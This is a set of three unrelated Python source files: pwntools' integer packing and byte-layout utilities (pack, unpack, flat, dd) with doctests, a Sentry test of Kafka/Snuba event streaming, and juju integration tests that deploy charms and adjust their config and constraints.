py | 1a4fc9e19a1373fd6874141a837ea904cf6af46d | # -*- coding: utf-8 -*-
r"""
Module for packing and unpacking integers.
Simplifies access to the standard ``struct.pack`` and ``struct.unpack``
functions, and also adds support for packing/unpacking arbitrary-width
integers.
The packers are all context-aware for ``endian`` and ``signed`` arguments,
though they can be overridden in the parameters.
Examples:
>>> p8(0)
b'\x00'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'
>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> with context.local(endian='big'): p32(0xdeadbeef)
b'\xde\xad\xbe\xef'
Make a frozen packer, which does not change with context.
>>> p=make_packer('all')
>>> p(0xff)
b'\xff'
>>> p(0x1ff)
b'\xff\x01'
>>> with context.local(endian='big'): print(repr(p(0x1ff)))
b'\xff\x01'
"""
from __future__ import absolute_import
from __future__ import division
import collections
import six
import struct
import sys
from six.moves import range
from pwnlib.context import LocalNoarchContext
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.util import iters
mod = sys.modules[__name__]
log = getLogger(__name__)
def pack(number, word_size = None, endianness = None, sign = None, **kwargs):
"""pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str
Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" will output a string long enough to contain all the significant
bits and thus be decodable by :func:`unpack`.
`word_size` can be any positive number. The output will contain word_size/8
rounded up number of bytes. If word_size is not a multiple of 8, it will be
padded with zeroes up to a byte boundary.
Arguments:
number (int): Number to convert
word_size (int): Word size of the converted integer or the string 'all' (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The packed number as a string.
Examples:
>>> pack(0x414243, 24, 'big', True)
b'ABC'
>>> pack(0x414243, 24, 'little', True)
b'CBA'
>>> pack(0x814243, 24, 'big', False)
b'\\x81BC'
>>> pack(0x814243, 24, 'big', True)
Traceback (most recent call last):
...
ValueError: pack(): number does not fit within word_size
>>> pack(0x814243, 25, 'big', True)
b'\\x00\\x81BC'
>>> pack(-1, 'all', 'little', True)
b'\\xff'
>>> pack(-256, 'all', 'big', True)
b'\\xff\\x00'
>>> pack(0x0102030405, 'all', 'little', True)
b'\\x05\\x04\\x03\\x02\\x01'
>>> pack(-1)
b'\\xff\\xff\\xff\\xff'
>>> pack(0x80000000, 'all', 'big', True)
b'\\x00\\x80\\x00\\x00\\x00'
"""
if sign is None and number < 0:
sign = True
if word_size != 'all':
kwargs.setdefault('word_size', word_size)
kwargs.setdefault('endianness', endianness)
kwargs.setdefault('sign', sign)
with context.local(**kwargs):
# Lookup in context if not found
word_size = 'all' if word_size == 'all' else context.word_size
endianness = context.endianness
sign = context.sign
if not isinstance(number, six.integer_types):
raise ValueError("pack(): number must be of type (int,long) (got %r)" % type(number))
if not isinstance(sign, bool):
raise ValueError("pack(): sign must be either True or False (got %r)" % sign)
if endianness not in ['little', 'big']:
raise ValueError("pack(): endianness must be either 'little' or 'big' (got %r)" % endianness)
# Verify that word_size make sense
if word_size == 'all':
if number == 0:
word_size = 8
elif number > 0:
if sign:
word_size = (number.bit_length() | 7) + 1
else:
word_size = ((number.bit_length() - 1) | 7) + 1
else:
if not sign:
raise ValueError("pack(): number does not fit within word_size")
word_size = ((number + 1).bit_length() | 7) + 1
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("pack(): word_size must be a positive integer or the string 'all'")
if sign:
limit = 1 << (word_size-1)
if not -limit <= number < limit:
raise ValueError("pack(): number does not fit within word_size")
else:
limit = 1 << word_size
if not 0 <= number < limit:
raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
# Normalize number and size now that we have verified them
# From now on we can treat positive and negative numbers the same
number = number & ((1 << word_size) - 1)
byte_size = (word_size + 7) // 8
out = []
for _ in range(byte_size):
out.append(_p8lu(number & 0xff))
number = number >> 8
if endianness == 'little':
return b''.join(out)
else:
return b''.join(reversed(out))
@LocalNoarchContext
def unpack(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int
Unpacks an arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" is equivalent to ``len(data)*8``.
If `word_size` is not a multiple of 8, then the bits used for padding
are discarded.
Arguments:
number (int): String to convert
word_size (int): Word size of the converted integer or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked number.
Examples:
>>> hex(unpack(b'\\xaa\\x55', 16, endian='little', sign=False))
'0x55aa'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=False))
'0xaa55'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=True))
'-0x55ab'
>>> hex(unpack(b'\\xaa\\x55', 15, endian='big', sign=True))
'0x2a55'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='little', sign=True))
'0x302ff'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='big', sign=True))
'-0xfdfd'
"""
# Lookup in context if not found
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
# Verify that word_size make sense
if word_size == 'all':
word_size = len(data) * 8
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("unpack(): word_size must be a positive integer or the string 'all'")
byte_size = (word_size + 7) // 8
if byte_size != len(data):
raise ValueError("unpack(): data must have length %d, since word_size was %d" % (byte_size, word_size))
number = 0
if endianness == "little":
data = reversed(data)
data = bytearray(data)
for c in data:
number = (number << 8) + c
number = number & ((1 << word_size) - 1)
if not sign:
return int(number)
signbit = number & (1 << (word_size-1))
return int(number - 2*signbit)
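# Added worked example: for data=b'\xaa\x55' with word_size=16, endian='big', sign=True the loop
# above gives number = 0xaa55; signbit = 0xaa55 & 0x8000 = 0x8000, so the result is
# 0xaa55 - 2*0x8000 = -0x55ab, matching the doctest in the docstring.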
@LocalNoarchContext
def unpack_many(data, word_size = None):
"""unpack_many(data, word_size = None, endianness = None, sign = None) -> int list
Splits `data` into groups of ``word_size//8`` bytes and calls :func:`unpack` on each group. Returns a list of the results.
`word_size` must be a multiple of `8` or the string "all". In the latter case a singleton list will always be returned.
Args
number (int): String to convert
word_size (int): Word size of the converted integers or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked numbers.
Examples:
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='little', sign=False)))
['0x55aa', '0x33cc']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=False)))
['0xaa55', '0xcc33']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=True)))
['-0x55ab', '-0x33cd']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='little', sign=True)))
['0x302ff']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='big', sign=True)))
['-0xfdfd']
"""
# Lookup in context if None
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size == 'all':
return [unpack(data, word_size)]
# Currently we only group on byte boundaries
if word_size % 8 != 0:
raise ValueError("unpack_many(): word_size must be a multiple of 8")
out = []
n = word_size // 8
for i in range(0, len(data), n):
out.append(unpack(data[i:i+n], word_size))
return list(map(int, out))
#
# Make individual packers, e.g. _p8lu
#
ops = {'p': struct.pack, 'u': lambda *a: struct.unpack(*(
x.encode('latin1') if not hasattr(x, 'decode') else x
for x in a))[0]}
sizes = {8:'b', 16:'h', 32:'i', 64:'q'}
ends = ['b','l']
signs = ['s','u']
def make_single(op,size,end,sign):
name = '_%s%s%s%s' % (op, size, end, sign)
fmt = sizes[size]
end = '>' if end == 'b' else '<'
if sign == 'u':
fmt = fmt.upper()
fmt = end+fmt
def routine(data):
return ops[op](fmt,data)
routine.__name__ = routine.__qualname__ = name
return name, routine
for op,size,end,sign in iters.product(ops, sizes, ends, signs):
name, routine = make_single(op,size,end,sign)
setattr(mod, name, routine)
return_types = {'p': 'str', 'u': 'int'}
op_verbs = {'p': 'pack', 'u': 'unpack'}
arg_doc = {'p': 'number (int): Number to convert',
'u': 'data (str): String to convert'}
rv_doc = {'p': 'The packed number as a string',
'u': 'The unpacked number'}
#
# Make normal user-oriented packers, e.g. p8
#
def make_multi(op, size):
name = "%s%s" % (op,size)
ls = getattr(mod, "_%sls" % (name))
lu = getattr(mod, "_%slu" % (name))
bs = getattr(mod, "_%sbs" % (name))
bu = getattr(mod, "_%sbu" % (name))
@LocalNoarchContext
def routine(number):
endian = context.endian
signed = context.signed
return {("little", True ): ls,
("little", False): lu,
("big", True ): bs,
("big", False): bu}[endian, signed](number)
routine.__name__ = name
routine.__doc__ = """%s%s(number, sign, endian, ...) -> %s
%ss an %s-bit integer
Arguments:
%s
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer ("unsigned"/"signed")
kwargs (dict): Arguments passed to context.local(), such as
``endian`` or ``signed``.
Returns:
%s
""" % (op, size, return_types[op], op_verbs[op].title(), size, arg_doc[op], rv_doc[op])
return name, routine
for op,size in iters.product(ops, sizes):
name, routine = make_multi(op,size)
setattr(mod, name, routine)
def make_packer(word_size = None, sign = None, **kwargs):
"""make_packer(word_size = None, endianness = None, sign = None) -> number → str
Creates a packer by "freezing" the given arguments.
Semantically calling ``make_packer(w, e, s)(data)`` is equivalent to calling
``pack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer or the string all (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signedness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a number and returns a string
of that number in a packed form.
Examples:
>>> p = make_packer(32, endian='little', sign='unsigned')
>>> p
<function _p32lu at 0x...>
>>> p(42)
b'*\\x00\\x00\\x00'
>>> p(-1)
Traceback (most recent call last):
...
error: integer out of range for 'I' format code
>>> make_packer(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
with context.local(sign=sign, **kwargs):
word_size = word_size or context.word_size
endianness = context.endianness
sign = sign if sign is None else context.sign
if word_size in [8, 16, 32, 64]:
packer = {
(8, 0, 0): _p8lu,
(8, 0, 1): _p8ls,
(8, 1, 0): _p8bu,
(8, 1, 1): _p8bs,
(16, 0, 0): _p16lu,
(16, 0, 1): _p16ls,
(16, 1, 0): _p16bu,
(16, 1, 1): _p16bs,
(32, 0, 0): _p32lu,
(32, 0, 1): _p32ls,
(32, 1, 0): _p32bu,
(32, 1, 1): _p32bs,
(64, 0, 0): _p64lu,
(64, 0, 1): _p64ls,
(64, 1, 0): _p64bu,
(64, 1, 1): _p64bs,
}.get((word_size, {'big': 1, 'little': 0}[endianness], sign), None)
if packer:
return packer
return lambda number: pack(number, word_size, endianness, sign)
@LocalNoarchContext
def make_unpacker(word_size = None, endianness = None, sign = None, **kwargs):
"""make_unpacker(word_size = None, endianness = None, sign = None, **kwargs) -> str → number
Creates a unpacker by "freezing" the given arguments.
Semantically calling ``make_unpacker(w, e, s)(data)`` is equivalent to calling
``unpack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signedness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a string and returns a number
of that string in an unpacked form.
Examples:
>>> u = make_unpacker(32, endian='little', sign='unsigned')
>>> u
<function _u32lu at 0x...>
>>> hex(u('/bin'))
'0x6e69622f'
>>> u('abcde')
Traceback (most recent call last):
...
error: unpack requires a string argument of length 4
>>> make_unpacker(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size in [8, 16, 32, 64]:
endianness = 1 if endianness == 'big' else 0
return {
(8, 0, 0): _u8lu,
(8, 0, 1): _u8ls,
(8, 1, 0): _u8bu,
(8, 1, 1): _u8bs,
(16, 0, 0): _u16lu,
(16, 0, 1): _u16ls,
(16, 1, 0): _u16bu,
(16, 1, 1): _u16bs,
(32, 0, 0): _u32lu,
(32, 0, 1): _u32ls,
(32, 1, 0): _u32bu,
(32, 1, 1): _u32bs,
(64, 0, 0): _u64lu,
(64, 0, 1): _u64ls,
(64, 1, 0): _u64bu,
(64, 1, 1): _u64bs,
}[word_size, endianness, sign]
else:
return lambda number: unpack(number, word_size, endianness, sign)
def _fit(pieces, preprocessor, packer, filler):
# Pulls bytes from `filler` and adds them to `pad` until it ends in `key`.
# Returns the index of `key` in `pad`.
pad = bytearray()
def fill(key):
key = bytearray(key)
offset = pad.find(key)
while offset == -1:
pad.append(next(filler))
offset = pad.find(key, -len(key))
return offset
# Key conversion:
# - convert str/unicode keys to offsets
# - convert large int (no null-bytes in a machine word) keys to offsets
pieces_ = dict()
large_key = 2**(context.word_size-8)
for k, v in pieces.items():
if isinstance(k, six.integer_types):
if k >= large_key:
k = fill(pack(k))
elif isinstance(k, six.text_type):
k = fill(k.encode('utf8'))
elif isinstance(k, (bytearray, bytes)):
k = fill(k)
else:
raise TypeError("flat(): offset must be of type int or str, but got '%s'" % type(k))
if k in pieces_:
raise ValueError("flag(): multiple values at offset %d" % k)
pieces_[k] = v
pieces = pieces_
# We must "roll back" `filler` so each recursive call to `_flat` gets it in
# the right position
filler = iters.chain(pad, filler)
# Build output
out = b''
# Negative indices need to be removed and then re-submitted
negative = {k:v for k,v in pieces.items() if isinstance(k, int) and k<0}
for k in negative:
del pieces[k]
# Positive output
for k, v in sorted(pieces.items()):
if k < len(out):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out) < k:
out += p8(next(filler))
# Recursively flatten data
out += _flat([v], preprocessor, packer, filler)
# Now do negative indices
out_negative = b''
if negative:
most_negative = min(negative.keys())
for k, v in sorted(negative.items()):
k += -most_negative
if k < len(out_negative):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out_negative) < k:
out_negative += p8(next(filler))
# Recursively flatten data
out_negative += _flat([v], preprocessor, packer, filler)
return filler, out_negative + out
def _flat(args, preprocessor, packer, filler):
out = []
for arg in args:
if not isinstance(arg, (list, tuple, dict)):
arg_ = preprocessor(arg)
if arg_ is not None:
arg = arg_
if hasattr(arg, '__flat__'):
val = arg.__flat__()
elif isinstance(arg, (list, tuple)):
val = _flat(arg, preprocessor, packer, filler)
elif isinstance(arg, dict):
filler, val = _fit(arg, preprocessor, packer, filler)
elif isinstance(arg, bytes):
val = arg
elif isinstance(arg, six.text_type):
val = arg.encode('utf8')
elif isinstance(arg, six.integer_types):
val = packer(arg)
elif isinstance(arg, bytearray):
val = bytes(arg)
else:
raise ValueError("flat(): Flat does not support values of type %s" % type(arg))
out.append(val)
# Advance `filler` for "non-recursive" values
if not isinstance(arg, (list, tuple, dict)):
for _ in range(len(val)):
next(filler)
return b''.join(out)
@LocalNoarchContext
def flat(*args, **kwargs):
r"""flat(\*args, preprocessor = None, length = None, filler = de_bruijn(),
word_size = None, endianness = None, sign = None) -> str
Flattens the arguments into a string.
This function takes an arbitrary number of arbitrarily nested lists, tuples
and dictionaries. It will then find every string and number inside those
and flatten them out. Strings are inserted directly while numbers are
packed using the :func:`pack` function. Unicode strings are UTF-8 encoded.
Dictionary keys give offsets at which to place the corresponding values
(which are recursively flattened). Offsets are relative to where the
flattened dictionary occurs in the output (i.e. `{0: 'foo'}` is equivalent
to `'foo'`). Offsets can be integers, unicode strings or regular strings.
Integer offsets >= ``2**(word_size-8)`` are converted to a string using
:func:`pack`. Unicode strings are UTF-8 encoded. After these conversions
offsets are either integers or strings. In the latter case, the offset will
be the lowest index at which the string occurs in `filler`. See examples
below.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be the byte at index ``n % len(iterable)`` in
`filler` if it has finite length, or the byte at index `n` otherwise.
If `length` is given, the output will be padded with bytes from `filler` to
be this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
The three kwargs `word_size`, `endianness` and `sign` will default to using
values in :mod:`pwnlib.context` if not specified as an argument.
Arguments:
args: Values to flatten
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
length: The length of the output.
filler: Iterable to use for padding.
word_size (int): Word size of the converted integer.
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer ("unsigned"/"signed").
Examples:
(Test setup, please ignore)
>>> context.clear()
Basic usage of :meth:`flat` works similar to the pack() routines.
>>> flat(4)
b'\x04\x00\x00\x00'
:meth:`flat` works with strings, bytes, lists, and dictionaries.
>>> flat(b'X')
b'X'
>>> flat([1,2,3])
b'\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00'
>>> flat({4:'X'})
b'aaaaX'
:meth:`.flat` flattens all of the values provided, and allows nested lists
and dictionaries.
>>> flat([{4:'X'}] * 2)
b'aaaaXaaacX'
>>> flat([[[[[[[[[1]]]], 2]]]]])
b'\x01\x00\x00\x00\x02\x00\x00\x00'
You can also provide additional arguments like endianness, word-size, and
whether the values are treated as signed or not.
>>> flat(1, "test", [[["AB"]*2]*3], endianness = 'little', word_size = 16, sign = False)
b'\x01\x00testABABABABABAB'
A preprocessor function can be provided in order to modify the values in-flight.
This example increments each value by 1, then converts it to a string.
>>> flat([1, [2, 3]], preprocessor = lambda x: str(x+1))
b'234'
Using dictionaries is a fast way to get specific values at specific offsets,
without having to do ``data += "foo"`` repeatedly.
>>> flat({12: 0x41414141,
... 24: 'Hello',
... })
b'aaaabaaacaaaAAAAeaaafaaaHello'
Dictionary usage permits directly using values derived from :func:`.cyclic`.
See :func:`.cyclic`, :func:`pwnlib.context.context.cyclic_alphabet`, and :data:`.context.cyclic_size`
for more options.
The cyclic pattern can be provided as either the text or hexadecimal offset.
>>> flat({ 0x61616162: 'X'})
b'aaaaX'
>>> flat({'baaa': 'X'})
b'aaaaX'
Fields do not have to be in linear order, and can be freely mixed.
This also works with cyclic offsets.
>>> flat({2: 'A', 0:'B'})
b'BaA'
>>> flat({0x61616161:'x', 0x61616162:'y'})
b'xaaay'
>>> flat({0x61616162:'y', 0x61616161:'x'})
b'xaaay'
String (cyclic) offsets and integer offsets can also be mixed in the same dictionary.
>>> flat({'caaa': 'XXXX', 16: '\x41', 20: 0xdeadbeef})
b'aaaabaaaXXXXdaaaAaaa\xef\xbe\xad\xde'
>>> flat({ 8: [0x41414141, 0x42424242], 20: 'CCCC'})
b'aaaabaaaAAAABBBBeaaaCCCC'
>>> fit({
... 0x61616161: 'a',
... 1: 'b',
... 0x61616161+2: 'c',
... 3: 'd',
... })
b'abadbaaac'
By default, gaps in the data are filled in with the :meth:`.cyclic` pattern.
You can customize this by providing an iterable or method for the ``filler``
argument.
>>> flat({12: 'XXXX'}, filler = b'_', length = 20)
b'____________XXXX____'
>>> flat({12: 'XXXX'}, filler = b'AB', length = 20)
b'ABABABABABABXXXXABAB'
Nested dictionaries also work as expected.
>>> flat({4: {0: 'X', 4: 'Y'}})
b'aaaaXaaaY'
>>> fit({4: {4: 'XXXX'}})
b'aaaabaaaXXXX'
Negative indices are also supported, though this only works for integer
keys.
>>> flat({-4: 'x', -1: 'A', 0: '0', 4:'y'})
b'xaaA0aaay'
"""
# HACK: To avoid circular imports we need to delay the import of `cyclic`
from pwnlib.util import cyclic
preprocessor = kwargs.pop('preprocessor', lambda x: None)
filler = kwargs.pop('filler', cyclic.de_bruijn())
length = kwargs.pop('length', None)
if isinstance(filler, str):
filler = bytearray(six.ensure_binary(filler))
if kwargs != {}:
raise TypeError("flat() does not support argument %r" % kwargs.popitem()[0])
filler = iters.cycle(filler)
out = _flat(args, preprocessor, make_packer(), filler)
if length:
if len(out) > length:
raise ValueError("flat(): Arguments does not fit within `length` (= %d) bytes" % length)
out += b''.join(p8(next(filler)) for _ in range(length - len(out)))
return out
def fit(*args, **kwargs):
"""Legacy alias for :func:`flat`"""
return flat(*args, **kwargs)
"""
Generates a string from a dictionary mapping offsets to data to place at
that offset.
For each key-value pair in `pieces`, the key is either an offset or a byte
sequence. In the latter case, the offset will be the lowest index at which
the sequence occurs in `filler`. See examples below.
Each piece of data is passed to :meth:`flat` along with the keyword
arguments `word_size`, `endianness` and `sign`.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be the byte at index ``n % len(iterable)`` in
`filler` if it has finite length, or the byte at index `n` otherwise.
If `length` is given, the output will be padded with bytes from `filler` to be
this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
If entries in `pieces` overlap, a :py:exc:`ValueError` exception is
raised.
Arguments:
pieces: Offsets and values to output.
length: The length of the output.
filler: Iterable to use for padding.
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
word_size (int): Word size of the converted integer (in bits).
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer ("unsigned"/"signed").
Examples:
"""
def signed(integer):
return unpack(pack(integer), signed=True)
def unsigned(integer):
return unpack(pack(integer))
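# A small sketch of what these helpers do (assuming the default 32-bit context):
# they reinterpret a value with the opposite signedness by packing and then
# unpacking it.
#
#     >>> signed(0xffffffff)
#     -1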
def dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False):
"""dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False) -> dst
Inspired by the command line tool ``dd``, this function copies `count` byte
values from offset `seek` in `src` to offset `skip` in `dst`. If `count` is
0, all of ``src[seek:]`` is copied.
If `dst` is a mutable type it will be updated. Otherwise a new instance of
the same type will be created. In either case the result is returned.
`src` can be an iterable of characters or integers, a unicode string or a
file object. If it is an iterable of integers, each integer must be in the
range [0;255]. If it is a unicode string, its UTF-8 encoding will be used.
The seek offset of file objects will be preserved.
Arguments:
dst: Supported types are :class:`file`, :class:`list`, :class:`tuple`,
:class:`str`, :class:`bytearray` and :class:`unicode`.
src: An iterable of byte values (characters or integers), a unicode
string or a file object.
count (int): How many bytes to copy. If `count` is 0 or larger than
``len(src[seek:])``, all bytes until the end of `src` are
copied.
skip (int): Offset in `dst` to copy to.
seek (int): Offset in `src` to copy from.
truncate (bool): If :const:`True`, `dst` is truncated at the last copied
byte.
Returns:
A modified version of `dst`. If `dst` is a mutable type it will be
modified in-place.
Examples:
>>> dd(tuple('Hello!'), b'?', skip = 5)
('H', 'e', 'l', 'l', 'o', b'?')
>>> dd(list('Hello!'), (63,), skip = 5)
['H', 'e', 'l', 'l', 'o', b'?']
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4).read()
'AAA\\x00\\x00\\x00\\x00AAA'
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4, truncate = True).read()
'AAA\\x00\\x00\\x00\\x00'
"""
# Re-open file objects to make sure we have the mode right
if hasattr(src, 'name'):
src = open(src.name, 'rb')
if hasattr(dst, 'name'):
real_dst = dst
dst = open(dst.name, 'rb+')
# Special case: both `src` and `dst` are files, so we don't need to hold
# everything in memory
if hasattr(src, 'seek') and hasattr(dst, 'seek'):
src.seek(seek)
dst.seek(skip)
n = 0
if count:
while n < count:
s = src.read(min(count - n, 0x1000))
if not s:
break
n += len(s)
dst.write(s)
else:
while True:
s = src.read(0x1000)
if not s:
break
n += len(s)
dst.write(s)
if truncate:
dst.truncate(skip + n)
src.close()
dst.close()
return real_dst
# Otherwise get `src` in canonical form, i.e. a string of at most `count`
# bytes
if isinstance(src, six.text_type):
if count:
# The only way to know where the `seek`th byte is, is to decode, but
# we only need to decode up to the first `seek + count` code points
src = src[:seek + count].encode('utf8')
# The code points may result in more than `seek + count` bytes
src = src[seek : seek + count]
else:
src = src.encode('utf8')[seek:]
elif hasattr(src, 'seek'):
src.seek(seek)
src_ = b''
if count:
while len(src_) < count:
s = src.read(count - len(src_))
if not s:
break
src_ += s
else:
while True:
s = src.read()
if not s:
break
src_ += s
src.close()
src = src_
elif isinstance(src, bytes):
if count:
src = src[seek : seek + count]
else:
src = src[seek:]
elif hasattr(src, '__iter__'):
src = src[seek:]
src_ = b''
for i, b in enumerate(src, seek):
if count and i > count + seek:
break
if isinstance(b, bytes):
src_ += b
elif isinstance(b, six.integer_types):
if b > 255 or b < 0:
raise ValueError("dd(): Source value %d at index %d is not in range [0;255]" % (b, i))
src_ += _p8lu(b)
else:
raise TypeError("dd(): Unsupported `src` element type: %r" % type(b))
src = src_
else:
raise TypeError("dd(): Unsupported `src` type: %r" % type(src))
# If truncate, then where?
if truncate:
truncate = skip + len(src)
# UTF-8 encode unicode `dst`
if isinstance(dst, six.text_type):
dst = dst.encode('utf8')
utf8 = True
else:
utf8 = False
# Match on the type of `dst`
if hasattr(dst, 'seek'):
dst.seek(skip)
dst.write(src)
if truncate:
dst.truncate(truncate)
dst.close()
dst = real_dst
elif isinstance(dst, (list, bytearray)):
dst[skip : skip + len(src)] = list(map(p8, bytearray(src)))
if truncate:
while len(dst) > truncate:
dst.pop()
elif isinstance(dst, tuple):
tail = dst[skip + len(src):]
dst = dst[:skip] + tuple(map(p8, bytearray(src)))
if not truncate:
dst = dst + tail
elif isinstance(dst, bytes):
tail = dst[skip + len(src):]
dst = dst[:skip] + src
if not truncate:
dst = dst + tail
else:
raise TypeError("dd(): Unsupported `dst` type: %r" % type(dst))
if utf8:
dst = dst.decode('utf8')
return dst
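# Illustrative sketch of the immutable-`dst` case described above (a new object
# of the same type is returned; output shown with Python 3 reprs):
#
#     >>> dd(b'Hello, world!', b'?', skip = 7)
#     b'Hello, ?orld!'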
del op, size, end, sign
del name, routine, mod
|
py | 1a4fca22569bbc2855c440161117196ff655a028 | from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.testutils import SnubaTestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(SnubaTestCase):
def setUp(self):
super(SnubaEventStreamTest, self).setUp()
self.kafka_eventstream = KafkaEventStream()
self.kafka_eventstream.producer = Mock()
@patch('sentry.eventstream.insert')
def test(self, mock_eventstream_insert):
now = datetime.utcnow()
def _get_event_count():
return snuba.query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
groupby=['project_id'],
filter_keys={'project_id': [self.project.id]},
).get(self.project.id, 0)
assert _get_event_count() == 0
raw_event = {
'event_id': 'a' * 32,
'message': 'foo',
'timestamp': time.mktime(now.timetuple()),
'level': logging.ERROR,
'logger': 'default',
'tags': [],
}
manager = EventManager(raw_event)
manager.normalize()
event = manager.save(self.project.id)
# verify eventstream was called by EventManager
insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
assert not insert_args
assert insert_kwargs == {
'event': event,
'group': event.group,
'is_new_group_environment': True,
'is_new': True,
'is_regression': False,
'is_sample': False,
'primary_hash': 'acbd18db4cc2f85cedef654fccc4a4d8',
'skip_consume': False
}
# pass arguments on to the Kafka EventStream
self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
assert not produce_args
assert produce_kwargs['topic'] == 'events'
assert produce_kwargs['key'] == six.text_type(self.project.id)
version, type_, primary_payload = json.loads(produce_kwargs['value'])[:3]
assert version == 2
assert type_ == 'insert'
# insert what would have been the Kafka payload directly
# into Snuba, expect an HTTP 200 and for the event to now exist
snuba.insert_raw([primary_payload])
assert _get_event_count() == 1
|
py | 1a4fcaabd027ce853f027cd50be2a3575dda21bd | import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'mysql',
application_name='mysql',
series='trusty',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
